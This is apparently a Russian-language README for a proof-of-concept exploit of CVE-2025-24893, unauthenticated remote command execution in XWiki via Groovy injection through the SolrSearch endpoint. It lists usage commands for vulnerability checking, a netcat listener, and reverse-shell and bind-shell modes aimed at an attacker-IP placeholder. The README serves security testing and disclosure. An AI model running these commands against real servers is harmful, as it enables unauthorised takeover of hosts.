
Доказательство концепции для CVE-2025-24893, демонстрирующее неавторизованное удаленное выполнение команд в XWiki через небезопасную серверную оценку шаблонов.
Этот репозиторий содержит контролируемое доказательство концепции (PoC) для CVE-2025-24893 — уязвимости неавторизованного удаленного выполнения команд (RCE) в XWiki.
Уязвимость позволяет злоумышленнику выполнять произвольные команды операционной системы на сервере из-за небезопасной обработки шаблонов и скриптов на стороне сервера.
XWiki — это открытая корпоративная вики-платформа, обычно используемая для:
Поскольку XWiki часто развертывается на серверах, доступных из интернета, уязвимости безопасности в обработке запросов и скриптовой логике могут иметь высокое реальное влияние.
Введенные пользователем данные, передаваемые в конечную точку SolrSearch, неправильно проверялись и обрабатывались скриптовым движком Groovy.
Это позволяло интерпретировать ввод злоумышленника как исполняемый серверный код, что приводило к выполнению команд на хост-системе.
Данный PoC демонстрирует следующее:
Режим обнаружения уязвимости Безопасно подтверждает, уязвим ли целевой экземпляр, выполняя безопасное выражение на стороне сервера.
Удаленное выполнение команд Демонстрирует выполнение произвольных команд на целевой системе.
Выполнение обратной оболочки (Reverse Shell) Устанавливает исходящее shell-соединение с целевой системы на тестовую.
Привязка оболочки (Bind Shell) (опционально) Открывает прослушивающую оболочку на целевом хосте (менее надежно, чем обратная оболочка).
python3 xwiki_cve_2025_24893.py http://target:8080 -m check
nc -lvnp 4444
python3 xwiki_cve_2025_24893.py http://target:8080 -m reverse -lh <attacker_ip> -lp 4444
python3 xwiki_cve_2025_24893.py http://target:8080 -m bind -lp 4444
SolrSearchЭтот проект предоставляется строго для образовательных целей и авторизованного тестирования безопасности.
Любое несанкционированное использование этого кода против систем без явного разрешения запрещено.
Этот репозиторий создан для демонстрации: